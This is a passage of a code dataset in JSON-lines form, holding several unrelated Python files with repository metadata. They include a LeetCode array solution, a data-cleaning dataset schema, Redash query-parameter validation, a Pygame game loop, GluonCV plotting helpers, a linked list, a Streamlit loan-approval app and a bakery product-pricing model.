-> List[int]:\n size = len(nums)\n ans = [0] * size\n ans[0] = 1\n for i in range(1, size):\n ans[i] = ans[i-1] * nums[i-1]\n right = 1\n for i in range(size-1, -1, -1):\n ans[i] = ans[i] * right\n right *= nums[i]\n return ans\n\n\nif __name__ == '__main__':\n solution = Solution()\n\n result = solution.productExceptSelf([1, 2, 3, 4])\n print(result)\n assert result == [24, 12, 8, 6]\n","repo_name":"geeknonerd/leetcode","sub_path":"smath/product_of_array_except_self.py","file_name":"product_of_array_except_self.py","file_ext":"py","file_size_in_byte":1352,"program_lang":"python","lang":"zh","doc_type":"code","stars":18,"dataset":"github-code","pt":"54"} +{"seq_id":"35347244303","text":"\"\"\"Define the domain of dataset\"\"\"\nfrom .error_type import *\n\n# details of each dataset\nKDD = {\n \"data_dir\": \"KDD\",\n \"error_types\": [\"missing_values\", \"outliers\"],\n \"label\": 'is_exciting_20',\n \"ml_task\": \"classification\",\n \"class_imbalance\": True,\n \"categorical_variables\":['is_exciting_20'],\n}\n\nCitation = {\n \"data_dir\": \"Citation\",\n \"error_types\": [\"duplicates\"],\n 'key_columns': ['title'],\n \"label\":\"CS\",\n \"ml_task\": \"classification\",\n \"text_variables\":[\"title\"],\n}\n\nMarketing = {\n \"data_dir\": \"Marketing\",\n \"error_types\": [\"missing_values\"],\n \"label\": 'Income',\n \"ml_task\": \"classification\"\n}\n\nAirbnb = {\n \"data_dir\": \"Airbnb\",\n \"error_types\": [\"missing_values\", \"outliers\", \"duplicates\"],\n \"label\": 'Rating',\n \"categorical_variables\": ['Rating'],\n \"ml_task\": \"classification\",\n 'key_columns': ['latitude', 'longitude'],\n}\n\nTitanic = {\n \"data_dir\": \"Titanic\",\n \"error_types\": [\"missing_values\"],\n \"drop_variables\": ['PassengerId', 'Name'],\n \"label\": \"Survived\",\n \"categorical_variables\":[\"Survived\"],\n \"ml_task\": \"classification\"\n}\n\nEEG = {\n \"data_dir\": \"EEG\",\n \"error_types\": [\"outliers\"],\n 'label':'Eye',\n \"categorical_variables\":['Eye'],\n \"ml_task\": \"classification\"\n}\n\nUSCensus = {\n \"data_dir\": \"USCensus\",\n \"error_types\": [\"missing_values\"],\n \"label\": 'Income',\n \"ml_task\": \"classification\"\n}\n\nRestaurant = {\n \"data_dir\": \"Restaurant\",\n \"error_types\": [\"duplicates\", \"inconsistency\"],\n \"label\": \"priceRange\",\n \"ml_task\": \"classification\",\n \"drop_variables\": [\"streetAddress\", \"telephone\", \"website\"],\n \"text_variables\": [\"name\", \"categories\", \"neighborhood\"],\n \"key_columns\": [\"telephone\"]\n}\n\nCredit = {\n \"data_dir\": \"Credit\",\n \"error_types\": [\"missing_values\", \"outliers\"],\n \"label\": \"SeriousDlqin2yrs\",\n \"categorical_variables\":[\"SeriousDlqin2yrs\"],\n \"ml_task\": \"classification\",\n \"class_imbalance\":True\n}\n\nSensor = {\n \"data_dir\": \"Sensor\",\n \"error_types\": [\"outliers\"],\n \"categorical_variables\": ['moteid'],\n \"label\": 'moteid',\n \"ml_task\": \"classification\"\n}\n\nMovie = {\n \"data_dir\": \"Movie\",\n \"error_types\": [\"duplicates\", \"inconsistency\"],\n \"key_columns\": [\"title\", \"year\"],\n \"categorical_variables\": [\"genres\"],\n \"text_variables\": [\"title\"],\n \"label\": \"genres\",\n \"ml_task\": \"classification\"\n}\n\nCompany = {\n \"data_dir\": \"Company\",\n \"error_types\": [\"inconsistency\"],\n \"label\": \"Sentiment\",\n \"ml_task\": \"classification\",\n \"drop_variables\": [\"Date\", \"Unnamed: 0\", \"City\"]\n}\n\nUniversity = {\n \"data_dir\": \"University\",\n \"error_types\": [\"inconsistency\"],\n \"label\": \"expenses thous$\",\n \"ml_task\": \"classification\",\n \"drop_variables\": [\"university name\", \"academic-emphasis\"]\n}\n\nKDD_major = {\n \"data_dir\": \"KDD_major\",\n \"error_types\": [\"mislabel\"],\n \"label\": 'is_exciting_20',\n \"ml_task\": \"classification\",\n \"class_imbalance\": True,\n \"categorical_variables\":['is_exciting_20'],\n}\n\nKDD_minor = {\n \"data_dir\": \"KDD_minor\",\n \"error_types\": [\"mislabel\"],\n \"label\": 'is_exciting_20',\n \"ml_task\": \"classification\",\n \"class_imbalance\": True,\n \"categorical_variables\":['is_exciting_20'],\n}\n\nKDD_uniform = {\n \"data_dir\": \"KDD_uniform\",\n \"error_types\": [\"mislabel\"],\n \"label\": 'is_exciting_20',\n \"ml_task\": \"classification\",\n \"class_imbalance\": True,\n \"categorical_variables\":['is_exciting_20'],\n}\n\nUSCensus_major = {\n \"data_dir\": \"USCensus_major\",\n \"error_types\": [\"mislabel\"],\n \"label\": 'Income',\n \"ml_task\": \"classification\"\n}\n\nUSCensus_minor = {\n \"data_dir\": \"USCensus_minor\",\n \"error_types\": [\"mislabel\"],\n \"label\": 'Income',\n \"ml_task\": \"classification\"\n}\n\nUSCensus_uniform = {\n \"data_dir\": \"USCensus_uniform\",\n \"error_types\": [\"mislabel\"],\n \"label\": 'Income',\n \"ml_task\": \"classification\"\n}\n\nEEG_major = {\n \"data_dir\": \"EEG_major\",\n \"error_types\": [\"mislabel\"],\n 'label':'Eye',\n \"categorical_variables\":['Eye'],\n \"ml_task\": \"classification\"\n}\n\nEEG_minor = {\n \"data_dir\": \"EEG_minor\",\n \"error_types\": [\"mislabel\"],\n 'label':'Eye',\n \"categorical_variables\":['Eye'],\n \"ml_task\": \"classification\"\n}\n\nEEG_uniform = {\n \"data_dir\": \"EEG_uniform\",\n \"error_types\": [\"mislabel\"],\n 'label':'Eye',\n \"categorical_variables\":['Eye'],\n \"ml_task\": \"classification\"\n}\n\n# domain of dataset \ndatasets = [KDD, Credit, Airbnb, USCensus, EEG, Titanic, \n Marketing, Sensor, Movie, Restaurant, Citation, \n Company, University, KDD_uniform, KDD_minor, KDD_major,\n USCensus_uniform, USCensus_major, USCensus_minor,\n EEG_uniform, EEG_minor, EEG_major]","repo_name":"anatolicvs/NettoyageML","sub_path":"schema/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":4721,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"36805654642","text":"import pystache\nfrom functools import partial\nfrom flask_login import current_user\nfrom numbers import Number\nfrom redash.utils import mustache_render, json_loads\nfrom redash.permissions import require_access, view_only\nfrom funcy import distinct\nfrom dateutil.parser import parse\n\n\ndef _pluck_name_and_value(default_column, row):\n row = {k.lower(): v for k, v in row.items()}\n name_column = \"name\" if \"name\" in row.keys() else default_column.lower()\n value_column = \"value\" if \"value\" in row.keys() else default_column.lower()\n\n return {\"name\": row[name_column], \"value\": unicode(row[value_column])}\n\n\ndef _load_result(query_id):\n from redash.authentication.org_resolving import current_org\n from redash import models\n\n query = models.Query.get_by_id_and_org(query_id, current_org)\n require_access(query.data_source.groups, current_user, view_only)\n query_result = models.QueryResult.get_by_id_and_org(query.latest_query_data_id, current_org)\n\n return json_loads(query_result.data)\n\n\ndef dropdown_values(query_id):\n data = _load_result(query_id)\n first_column = data[\"columns\"][0][\"name\"]\n pluck = partial(_pluck_name_and_value, first_column)\n return map(pluck, data[\"rows\"])\n\n\ndef _collect_key_names(nodes):\n keys = []\n for node in nodes._parse_tree:\n if isinstance(node, pystache.parser._EscapeNode):\n keys.append(node.key)\n elif isinstance(node, pystache.parser._SectionNode):\n keys.append(node.key)\n keys.extend(_collect_key_names(node.parsed))\n\n return distinct(keys)\n\n\ndef _collect_query_parameters(query):\n nodes = pystache.parse(query)\n keys = _collect_key_names(nodes)\n return keys\n\n\ndef _parameter_names(parameter_values):\n names = []\n for key, value in parameter_values.iteritems():\n if isinstance(value, dict):\n for inner_key in value.keys():\n names.append(u'{}.{}'.format(key, inner_key))\n else:\n names.append(key)\n\n return names\n\n\ndef _is_date(string):\n try:\n parse(string)\n return True\n except ValueError:\n return False\n\n\ndef _is_date_range(obj):\n try:\n return _is_date(obj[\"start\"]) and _is_date(obj[\"end\"])\n except (KeyError, TypeError):\n return False\n\n\nclass ParameterizedQuery(object):\n def __init__(self, template, schema=None):\n self.schema = schema or []\n self.template = template\n self.query = template\n self.parameters = {}\n\n def apply(self, parameters):\n invalid_parameter_names = [key for (key, value) in parameters.iteritems() if not self._valid(key, value)]\n if invalid_parameter_names:\n raise InvalidParameterError(invalid_parameter_names)\n else:\n self.parameters.update(parameters)\n self.query = mustache_render(self.template, self.parameters)\n\n return self\n\n def _valid(self, name, value):\n if not self.schema:\n return True\n\n definition = next((definition for definition in self.schema if definition[\"name\"] == name), None)\n\n if not definition:\n return False\n\n validators = {\n \"text\": lambda value: isinstance(value, basestring),\n \"number\": lambda value: isinstance(value, Number),\n \"enum\": lambda value: value in definition[\"enumOptions\"],\n \"query\": lambda value: unicode(value) in [v[\"value\"] for v in dropdown_values(definition[\"queryId\"])],\n \"date\": _is_date,\n \"datetime-local\": _is_date,\n \"datetime-with-seconds\": _is_date,\n \"date-range\": _is_date_range,\n \"datetime-range\": _is_date_range,\n \"datetime-range-with-seconds\": _is_date_range,\n }\n\n validate = validators.get(definition[\"type\"], lambda x: False)\n\n return validate(value)\n\n @property\n def is_safe(self):\n text_parameters = filter(lambda p: p[\"type\"] == \"text\", self.schema)\n return not any(text_parameters)\n\n @property\n def missing_params(self):\n query_parameters = set(_collect_query_parameters(self.template))\n return set(query_parameters) - set(_parameter_names(self.parameters))\n\n @property\n def text(self):\n return self.query\n\n\nclass InvalidParameterError(Exception):\n def __init__(self, parameters):\n message = u\"The following parameter values are incompatible with their definitions: {}\".format(\", \".join(parameters))\n super(InvalidParameterError, self).__init__(message)\n","repo_name":"neo-ytx/redash-7.0.0","sub_path":"redash/utils/parameterized_query.py","file_name":"parameterized_query.py","file_ext":"py","file_size_in_byte":4538,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"28200285588","text":"# Jogo\nfrom turtle import window_height\nfrom assets import * # Importa as funções\nfrom level_class import * # Importa as Classes\nimport pygame # Importa biblioteca Pygame\nfrom settings import *\nfrom random import choice\n\n# Inicializa o Pygame\npygame.init()\n\n# ----- Gera tela principal\nwindow = pygame.display.set_mode((screen_width, screen_height))\npygame.display.set_caption(\"Carlo's Delta Escape\")\nclock = pygame.time.Clock()\nlevel = Level(level_map, window)\n\n# ============ Inicia Assets ===========\nassets['snail_death_sound'] = pygame.mixer.Sound('Assets/snail_sounds/CaracolDeath.mp3')\nassets['player_jump_sounds'] = [pygame.mixer.Sound('Assets/player_sounds/MacacoPulo1.mp3'), pygame.mixer.Sound('Assets/player_sounds/MacacoPulo2.mp3')]\nganhou = False\nplayer = level.player.sprite\nscore = player.score\nlore_count = 1\n\n# =========== Sons ============\npygame.mixer.music.load('assets/sounds/musiquinha-fundo.mp3')\npygame.mixer.music.set_volume(0.3)\nsnail_death_sound = assets['snail_death_sound']\nplayer_jump_sounds = assets['player_jump_sounds']\npygame.mixer.init() \n\n# ----- Inicia estruturas de dados\nINICIO = 0\nLORE = 1\nGAME = 2\nGAME_OVER = 3\nQUIT = 4\nWIN = 5\nCOMMANDS = 6\n\ngame = INICIO\n\n# Inicializando variáveis\n\n\n# ===== Loop principal =====\npygame.mixer.music.play(loops=-1)\n\nwhile game != QUIT:\n\n if game == INICIO or game == GAME_OVER or game == WIN or game == COMMANDS or game == LORE:\n # ----- Trata eventos\n for event in pygame.event.get():\n # ----- Verifica consequências\n if event.type == pygame.KEYUP:\n if event.key == pygame.K_SPACE: \n if game == COMMANDS:\n game = INICIO\n\n if event.key == pygame.K_c:\n if game == INICIO:\n game = COMMANDS\n\n if event.key == pygame.K_x:\n if game == LORE:\n lore_count += 1\n if lore_count == 7:\n game = GAME\n\n if event.key == pygame.K_RETURN:\n if game == GAME_OVER:\n del level\n level = Level(level_map, window)\n score = 0\n game = GAME\n \n if game == WIN:\n del level\n level = Level(level_map, window)\n score = 0\n game = GAME\n\n if game == INICIO:\n game = LORE\n\n \n if event.type == pygame.QUIT:\n game = QUIT\n \n if game == INICIO: # se o jogo está na tela de inicio \n window.fill((0, 0, 0))\n window.blit(assets['tela de inicio'], (0, 0))\n \n elif game == LORE: # se o jogo está apresentando a cutscene \n window.fill((0, 0, 0))\n if lore_count == 1:\n window.blit(assets['lore1'], (0, 0))\n elif lore_count == 2:\n window.blit(assets['lore2'], (0, 0))\n elif lore_count == 3:\n window.blit(assets['lore3'], (0, 0))\n elif lore_count == 4:\n window.blit(assets['lore4'], (0, 0))\n elif lore_count == 5:\n window.blit(assets['lore5'], (0, 0))\n elif lore_count == 6:\n window.blit(assets['lore6'], (0, 0))\n\n elif game == GAME_OVER: # se o jogo está na tela de inicio (player perdeu) \n\n window.fill((0, 0, 0)) \n window.blit(assets['game over'], (0, 0))\n\n elif game == WIN: # se o jogo está na tela de vitória\n if score < 15000:\n window.fill((0, 0, 0))\n window.blit(assets['final ruim'], (0, 0))\n\n font = pygame.font.SysFont(None, 48)\n text = font.render('15.000', True, (255, 255, 255))\n text2 = font.render('{}'.format(score), True, (255, 255, 255))\n\n window.blit(text2, (100, 210))\n window.blit(text, (100, 320))\n else:\n window.fill((0, 0, 0))\n window.blit(assets['final bom'], (0, 0))\n\n elif game == COMMANDS: # se o jogo está na tela de comandos \n window.fill((0, 0, 0)) \n window.blit(assets['comandos'], (0, 0))\n \n elif game == GAME: # se o jogo está rodando\n \n player = level.player.sprite\n\n # ----- Trata eventos\n for event in pygame.event.get():\n # ----- Verifica consequências\n if event.type == pygame.QUIT:\n game = QUIT \n\n # ----- Jump Sound:\n if player.can_jump_sound:\n choice(assets['player_jump_sounds']).play()\n player.can_jump_sound = False\n \n # ----- Player Info\n if player.hp <= 0 :#or len(caiu) > 0:\n game = GAME_OVER\n level.destroy()\n score = 0\n continue\n\n # Recarrega Munição\n if len(player.banana_storage) < 3:\n recharge_hits = pygame.sprite.spritecollide(player, level.recharge, True)\n for hit in recharge_hits:\n if len(player.banana_storage) > 0:\n for b in player.banana_storage:\n player.banana_storage.sprites()[-1].kill()\n score += 1000\n x = 30\n for i in range(3):\n x += 30\n balas_restantes = Munition(x, 10)\n player.banana_storage.add(balas_restantes)\n player.groups[\"all_sprites\"].add(balas_restantes)\n\n # Verifica se o caracol foi atingido pela banana - caso sim, ambos são deletados \n hits = pygame.sprite.groupcollide(groups['all_bananas'], groups['all_tiles'] , True, False, pygame.sprite.collide_mask)\n\n # Verifica se a \"bala\" bateu no chão - se sim, ela é deletada\n hits = pygame.sprite.groupcollide(groups['all_bananas'], groups['all_snails'] , True, True, pygame.sprite.collide_mask)\n if len(hits) > 0:\n snail_death_sound.play()\n score += 2000\n \n # Verifica se o player chegou ao final do jogo (chegou no computador)\n chegou_final = pygame.sprite.spritecollide(player, level.totem, False, pygame.sprite.collide_mask)\n if len(chegou_final) > 0:\n ganhou = True\n \n # Tira ponto do player caso ele seja atingido \n if player.dmg_score:\n score -= 500\n player.dmg_score = False\n\n # printa Score\n font = pygame.font.SysFont(None, 48)\n score_text = font.render('{}'.format(score), True, (255, 255, 255))\n\n # ----- Gera saídas\n window.fill((0, 0, 0)) # Preenche com a cor branca\n window.blit(assets['background'], (0, 0))\n window.blit(score_text, (65,80))\n level.run()\n all_sprites.update() \n all_sprites.draw(window)\n\n if ganhou:\n game = WIN\n ganhou = False\n level.destroy()\n\n # ----- Atualiza estado do jogo\n pygame.display.update() # Mostra o novo frame para o jogador\n\n clock.tick(60) ","repo_name":"antoniolma/PyGameDessoft","sub_path":"Game.py","file_name":"Game.py","file_ext":"py","file_size_in_byte":7369,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"71586153121","text":"\"\"\"Visualize image.\"\"\"\nimport numpy as np\ntry:\n import mxnet as mx\nexcept ImportError:\n mx = None\n\ndef plot_image(img, ax=None, reverse_rgb=False):\n \"\"\"Visualize image.\n\n Parameters\n ----------\n img : numpy.ndarray or mxnet.nd.NDArray\n Image with shape `H, W, 3`.\n ax : matplotlib axes, optional\n You can reuse previous axes if provided.\n reverse_rgb : bool, optional\n Reverse RGB<->BGR orders if `True`.\n\n Returns\n -------\n matplotlib axes\n The ploted axes.\n\n Examples\n --------\n\n from matplotlib import pyplot as plt\n ax = plot_image(img)\n plt.show()\n \"\"\"\n from matplotlib import pyplot as plt\n if ax is None:\n # create new axes\n fig = plt.figure()\n ax = fig.add_subplot(1, 1, 1)\n if mx is not None and isinstance(img, mx.nd.NDArray):\n img = img.asnumpy()\n img = img.copy()\n if reverse_rgb:\n img[:, :, (0, 1, 2)] = img[:, :, (2, 1, 0)]\n ax.imshow(img.astype(np.uint8))\n return ax\n\ndef cv_plot_image(img, scale=1, upperleft_txt=None, upperleft_txt_corner=(10, 100),\n left_txt_list=None, left_txt_corner=(10, 150),\n title_txt_list=None, title_txt_corner=(500, 50),\n canvas_name='demo'):\n \"\"\"Visualize image with OpenCV.\n\n Parameters\n ----------\n img : numpy.ndarray or mxnet.nd.NDArray\n Image with shape `H, W, 3`.\n scale : float\n The scaling factor of the output image\n upperleft_txt : str, optional, default is None\n If presents, will print the string at the upperleft corner\n upperleft_txt_corner : tuple, optional, default is (10, 100)\n The bottomleft corner of `upperleft_txt`\n left_txt_list : list of str, optional, default is None\n If presents, will print each string in the list close to the left\n left_txt_corner : tuple, optional, default is (10, 150)\n The bottomleft corner of `left_txt_list`\n title_txt_list : list of str, optional, default is None\n If presents, will print each string in the list close to the top\n title_txt_corner : tuple, optional, default is (500, 50)\n The bottomleft corner of `title_txt_list`\n canvas_name : str, optional, default is 'demo'\n The name of the canvas to plot the image\n\n Examples\n --------\n\n from matplotlib import pyplot as plt\n ax = plot_image(img)\n plt.show()\n \"\"\"\n from ..filesystem import try_import_cv2\n cv2 = try_import_cv2()\n\n if mx is not None and isinstance(img, mx.nd.NDArray):\n img = img.asnumpy()\n\n height, width, _ = img.shape\n img = cv2.resize(img, (int(width * scale), int(height * scale)))\n if upperleft_txt is not None:\n font = cv2.FONT_HERSHEY_SIMPLEX\n bottomLeftCornerOfText = upperleft_txt_corner\n fontScale = 1\n fontColor = (255, 255, 255)\n thickness = 3\n\n cv2.putText(img, upperleft_txt, bottomLeftCornerOfText,\n font, fontScale, fontColor, thickness)\n\n if left_txt_list is not None:\n starty = left_txt_corner[1]\n for txt in left_txt_list:\n font = cv2.FONT_HERSHEY_SIMPLEX\n bottomLeftCornerOfText = (left_txt_corner[0], starty)\n fontScale = 1\n fontColor = (255, 255, 255)\n thickness = 1\n\n cv2.putText(img, txt, bottomLeftCornerOfText,\n font, fontScale, fontColor, thickness)\n\n starty += 30\n\n if title_txt_list is not None:\n font = cv2.FONT_HERSHEY_SIMPLEX\n bottomLeftCornerOfText = title_txt_corner\n fontScale = 1\n fontColor = (255, 255, 255)\n thickness = 3\n\n for txt in title_txt_list:\n cv2.putText(img, txt, bottomLeftCornerOfText,\n font, fontScale, fontColor, thickness)\n bottomLeftCornerOfText = (bottomLeftCornerOfText[0] + 100,\n bottomLeftCornerOfText[1] + 50)\n\n canvas = cv2.cvtColor(img, cv2.COLOR_RGB2BGR)\n cv2.imshow(canvas_name, canvas)\n","repo_name":"dmlc/gluon-cv","sub_path":"gluoncv/utils/viz/image.py","file_name":"image.py","file_ext":"py","file_size_in_byte":4059,"program_lang":"python","lang":"en","doc_type":"code","stars":5662,"dataset":"github-code","pt":"54"} +{"seq_id":"25520281503","text":"from pyds.node import ListNode, DoubleListNode\n\n\nclass LinkedList:\n\n def __init__(self, x):\n self._head = ListNode(data=x)\n self._len = 1\n\n def __getitem__(self, item):\n if item == \"head\":\n return self._head\n\n def __str__(self):\n temp = self._head\n x = str(temp[\"data\"])+\" \"\n while temp[\"next\"] is not None:\n temp = temp[\"next\"]\n x += str(temp[\"data\"])+\" \"\n return x\n\n def append(self, x):\n curr = self._head\n while curr[\"next\"] is not None:\n curr = curr[\"next\"]\n curr[\"next\"] = ListNode(data=x)\n self._len += 1\n\n def extend(self, x):\n curr = self._head\n while curr[\"next\"] is not None:\n curr = curr[\"next\"]\n for i in x:\n curr[\"next\"] = ListNode(data=i)\n curr = curr[\"next\"]\n self._len += 1\n\n def insert(self, x, pos):\n if pos > self._len:\n raise RuntimeError(f\"Unable to insert {x} at {pos} as length of the list object at 0x{id(self)} is {self._len}\")\n if pos == 0:\n new = ListNode(data=x, next_=self._head)\n self._head = new\n self._len += 1\n elif pos == self._len:\n self.append(x)\n else:\n curr = self._head\n count = 0\n while count < pos-1 and curr[\"next\"] is not None:\n curr = curr[\"next\"]\n count += 1\n new = ListNode(data=x, next_=curr[\"next\"])\n curr[\"next\"] = new\n self._len += 1\n\n def delete(self, x):\n curr = self._head\n if curr[\"data\"] == x:\n self._head = curr[\"next\"]\n curr[\"next\"] = None\n return\n while curr[\"next\"][\"data\"] != x and curr[\"next\"] is not None:\n curr = curr[\"next\"]\n if curr[\"next\"] is None:\n return -1\n else:\n temp = curr[\"next\"]\n curr[\"next\"] = temp[\"next\"]\n temp[\"next\"] = None\n return 1\n\n def mid(self):\n slow = self._head\n fast = self._head\n while fast is not None and fast[\"next\"] is not None:\n slow = slow[\"next\"]\n fast = fast[\"next\"][\"next\"]\n return slow[\"data\"]\n\n\nclass DoublyLinkedList:\n def __init__(self, x):\n self._head = DoubleListNode(data=x)\n","repo_name":"Raagulbharatwaj/pyds-0.1.0","sub_path":"pyds/llist.py","file_name":"llist.py","file_ext":"py","file_size_in_byte":2366,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"74492399522","text":"import joblib\nimport streamlit as st\nimport numpy as np\nimport wget\n\nmodel_name = 'RF_Loan_model.joblib'\nfile_url = \"https://raw.githubusercontent.com/manifoldailearning/Complete-MLOps-BootCamp/main/Build-ML-App-Streamlit/RF_Loan_model.joblib\"\nwget.download(file_url)\nmodel = joblib.load(model_name)\n\ndef prediction(Gender,Married,Dependents,\n Education,Self_Employed,ApplicantIncome,CoapplicantIncome,\n LoanAmount,Loan_Amount_Term,Credit_History,Property_Area):\n if Gender == \"Male\":\n Gender = 1\n else:\n Gender = 0\n\n if Married == \"Yes\":\n Married = 1\n else:\n Married = 0\n\n if Education == \"Graduate\":\n Education = 0\n else:\n Education = 1\n \n if Self_Employed == \"Yes\":\n Self_Employed = 1\n else:\n Self_Employed = 0\n\n if Credit_History == \"Outstanding Loan\":\n Credit_History = 1\n else:\n Credit_History = 0 \n \n if Property_Area == \"Rural\":\n Property_Area = 0\n elif Property_Area == \"Semi Urban\":\n Property_Area = 1 \n else:\n Property_Area = 2 \n Total_Income = np.log(ApplicantIncome + CoapplicantIncome)\n\n prediction = model.predict([[Gender, Married, Dependents, Education, Self_Employed,LoanAmount, Loan_Amount_Term, Credit_History, Property_Area,Total_Income]])\n print(print(prediction))\n\n if prediction==0:\n pred = \"Rejected\"\n\n else:\n pred = \"Approved\"\n return pred \n\n\ndef main():\n # Front end\n st.title(\"Welcome to Loan Application\")\n st.header(\"Please enter your details to proceed with your loan Application\")\n Gender = st.selectbox(\"Gender\",(\"Male\",\"Female\"))\n Married = st.selectbox(\"Married\",(\"Yes\",\"No\"))\n Dependents = st.number_input(\"Number of Dependents\")\n Education = st.selectbox(\"Education\",(\"Graduate\",\"Not Graduate\"))\n Self_Employed = st.selectbox(\"Self Employed\",(\"Yes\",\"No\"))\n ApplicantIncome = st.number_input(\"Applicant Income\")\n CoapplicantIncome = st.number_input(\"Coapplicant Income\")\n LoanAmount = st.number_input(\"LoanAmount\")\n Loan_Amount_Term = st.number_input(\"Loan Amount Term\")\n Credit_History = st.selectbox(\"Credit History\",(\"Outstanding Loan\", \"No Outstanding Loan\"))\n Property_Area = st.selectbox(\"Property Area\",(\"Rural\",\"Urban\",\"Semi Urban\"))\n\n if st.button(\"Predict\"):\n result = prediction(Gender,Married,Dependents,\n Education,Self_Employed,ApplicantIncome,CoapplicantIncome,\n LoanAmount,Loan_Amount_Term,Credit_History,Property_Area)\n \n if result == \"Approved\":\n st.success(\"Your loan Application is Approved\")\n else:\n st.error(\"Your loan Application is Rejected\")\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"manifoldailearning/Complete-MLOps-BootCamp","sub_path":"Build-ML-App-Streamlit/streamlit-ml-app.py","file_name":"streamlit-ml-app.py","file_ext":"py","file_size_in_byte":2895,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"32572466200","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n'''\nCreated on 14/03/2015\n\n@author: jorgesaw\n'''\n\nfrom __future__ import absolute_import, unicode_literals, print_function\nimport PyQt4.QtCore as _qc\nfrom imperial.core.util.cadenas import printable\nimport datetime\n\n#uDatos que sirven para diferenciarlos al editar los precios de ambos.\nPRECIO_PRODUCTO, PRECIO_INGREDIENTE = range(2) \n#NAME, CODE, EXT_CODE, PRICE, BUY_PRICE, STOCK, PACK_UNITS, CATEGORY, \\\n#MIN_STOCK, IDEAL_STOCK, DESCRIPTION = range(11)\nNAME, PRICE, DESCRIPTION, CATEGORIA_PROD, PRECIO_NUEVO, POS_PRECIO = range(6)\nclass Product(object):\n \"\"\"\n \"\"\"\n name = \"\"\n #precio = 0.0\n categoria = 1\n #Constants for type of product, it defines the tax it to be charged (depends on other crappy stuff)\n descripcion = \"\"\n\n def __init__(self, name=\"\", precio=0.0, categoria=1):\n self.setName(name)\n self.precio = precio\n self.categoria = categoria\n self.activo = True\n \n def __cmp__(self, other):\n return _qc.QString.localeAwareCompare(self.name.lower(),\n other.name.lower())\n \n def precioActivo(self, fecha_precio=datetime.date.today()):\n #lstPrecios = set()\n \n fecha_precio_activo = datetime.date(1982, 1, 27)\n precio_activo = None\n \n for precio_guardado in self.colPrecioProd:\n #if self.id == 4:\n # print('FECHA:', precio_guardado.fecha_ingreso, ' | PRECIO:', precio_guardado.precio)\n if precio_guardado.fecha_ingreso <= fecha_precio:\n #lstPrecios.add(precio_guardado)\n if precio_guardado.fecha_ingreso > fecha_precio_activo:\n precio_activo = precio_guardado\n fecha_precio_activo = precio_guardado.fecha_ingreso\n \n #if len(lstPrecios) > 0: \n # self.precio = max(lstPrecios).precio\n #print('Hay Precio!!!')\n #else: \n # self.precio = 0.0\n #self.precio = min(self.colPrecioProd).precio\n #print(self.precio)\n \n if precio_activo:\n self.precio = precio_activo.precio\n else:\n self.precio = 0.0\n \n #if self.id == 4:\n # print('El precio activo a la fecha de hot es:', self.precio)\n \n return self.precio\n \n def __str__(self):\n #return \"[{0}] ${1:.2f} {2}\".format(self.code, self.price, self.name)\n return \"{}\".format(self.name)\n\n def setName(self, name):\n self.name = printable(name)\n \n @staticmethod\n def data2Object(lstDatos):\n prod = Product(lstDatos[NAME], lstDatos[PRICE], lstDatos[CATEGORIA_PROD])\n prod.description = lstDatos[DESCRIPTION]\n \n precioProd = PrecioProd(lstDatos[PRICE], datetime.date.today())\n \n prod.colPrecioProd.append(precioProd)\n \n return prod\n\n @staticmethod\n def object2Data(prod):\n precio = 0.0\n if len(prod.colPrecioProd) > 0:\n precio = prod.colPrecioProd[len(prod.colPrecioProd) - 1].precio\n return [prod.name, precio, \n prod.description, prod.categoria] \n \n @staticmethod\n def editObject(prod, lstDatos):\n prod.name = lstDatos[NAME] \n prod.price = lstDatos[PRICE]\n prod.description = lstDatos[DESCRIPTION]\n prod.categoria = lstDatos[CATEGORIA_PROD]\n \n if lstDatos[PRECIO_NUEVO]:#uSi el precio es nuevo.\n #uCreo un nuevo precio\n precioProd = PrecioProd(lstDatos[PRICE], datetime.date.today())\n prod.colPrecioProd.append(precioProd)\n else:\n #uActualizo el precio\n prod.colPrecioProd[lstDatos[POS_PRECIO]].precio = lstDatos[PRICE]\n \n @staticmethod\n def type():\n return Product\n \nPRECIO_PROD, FECHA_INGRESO_PROD = range(2)\nclass PrecioProd(object):\n u\"\"\"Clase que representa el precio de un producto.\"\"\"\n \n def __init__(self, precio, fecha_ingreso):\n self.precio = precio\n self.fecha_ingreso = fecha_ingreso\n \n def __str__(self):\n return '{}-{}'.format(self.precio, self.fecha_ingreso)\n \n @staticmethod\n def data2Object(lstDatos):\n precioProd = PrecioProd(lstDatos[PRECIO_PROD, FECHA_INGRESO_PROD])\n return precioProd\n \n @staticmethod\n def object2Data(precioProd):\n return [precioProd.ingrediente, precioProd.cant]\n \n @staticmethod\n def editObject(precioProd, lstDatos):\n precioProd.precio = lstDatos[PRECIO_PROD]\n precioProd.fecha_ingreso = lstDatos[FECHA_INGRESO_PROD]\n \n @staticmethod\n def type():\n return PrecioProd \n \nNAME_CATEGORIA, = range(1)\nclass Category(object):\n VARIOS = 1\n PAN = 2\n \n lstRubros = [u'VARIOS', u'PAN']\n \n name = \"\"\n def __init__(self, name=\"\"):\n self.name = name\n \n def __str__(self):\n return '{}'.format(self.name)\n \n @staticmethod\n def data2Object(lstDatos):\n category = Category(lstDatos[NAME])\n return category\n \n @staticmethod\n def object2Data(category):\n return [category.name]\n \n @staticmethod\n def editObject(category, lstDatos):\n category.name = lstDatos[NAME]\n \n @staticmethod\n def type():\n return Category\n\nNAME_PROV, EMAIL_PROV, DIRECCION_PROV, BARRIO_PROV, CIUDAD_PROV, \\\nTELEFONO_PROV, CELULAR_PROV, ALTURA_PROV, PISO_PROV, DEPTO_PROV, PROVINCIA_PROV, \\\nFECHA_ALTA_PROV, VENDEDOR_PROV = range(13)\nclass Proveedor(object):\n \"\"\"Proveedor\n \"\"\"\n nombre = \"\"\n direccion = None\n tel = \"\"\n cel = \"\"\n fecha_alta = None\n \n def __init__(self, nombre, telefono=None, celular=None, email=None):\n self.nombre = nombre\n self.telefono = telefono\n self.celular = celular\n self.email = email\n self.fecha_alta = datetime.date.today()\n \n def 